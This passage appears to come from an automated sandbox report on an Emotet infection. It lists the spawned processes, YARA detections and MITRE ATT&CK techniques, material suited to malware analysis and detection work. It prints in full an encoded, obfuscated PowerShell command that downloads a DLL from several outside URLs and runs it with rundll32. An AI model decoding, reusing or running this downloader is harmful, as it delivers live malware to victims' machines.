XQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA
Imagebase:	0x7ff77d8b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7012 Parent PID: 7000

General

Start time:	11:52:52
Start date:	07/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: msg.exe PID: 7044 Parent PID: 7000

General

Start time:	11:52:52
Start date:	07/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0x7ff7e7960000
File size:	26112 bytes
MD5 hash:	EEB395D8DD3C1D6593903BD640687948
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 7064 Parent PID: 7000

General

Start time:	11:52:52
Start date:	07/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289399769.0000018A15456000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.280124224.0000018A123D5000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.290618766.0000018A2C1C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289463456.0000018A154C9000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.289073167.0000018A15205000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: svchost.exe PID: 5692 Parent PID: 568

General

Start time:	11:53:11
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6268 Parent PID: 568

General

Start time:	11:53:15
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6520 Parent PID: 568

General

Start time:	11:53:21
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 204 Parent PID: 7064

General

Start time:	11:53:24
Start date:	07/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Imagebase:	0x7ff6c54c0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 4456 Parent PID: 204

General

Start time:	11:53:24
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Imagebase:	0x880000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: rundll32.exe PID: 5928 Parent PID: 4456

General

Start time:	11:53:26
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Imagebase:	0x880000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: svchost.exe PID: 784 Parent PID: 568

General

Start time:	11:53:26
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 4648 Parent PID: 568

General

Start time:	11:53:27
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 5552 Parent PID: 568

General

Start time:	11:53:28
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: SgrmBroker.exe PID: 4560 Parent PID: 568

General

Start time:	11:53:28
Start date:	07/01/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7d2210000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 912 Parent PID: 568

General

Start time:	11:53:29
Start date:	07/01/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7488e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: MpCmdRun.exe PID: 7072 Parent PID: 912

General

Start time:	11:54:30
Start date:	07/01/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff70e820000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7084 Parent PID: 7072

General

Start time:	11:54:30
Start date:	07/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
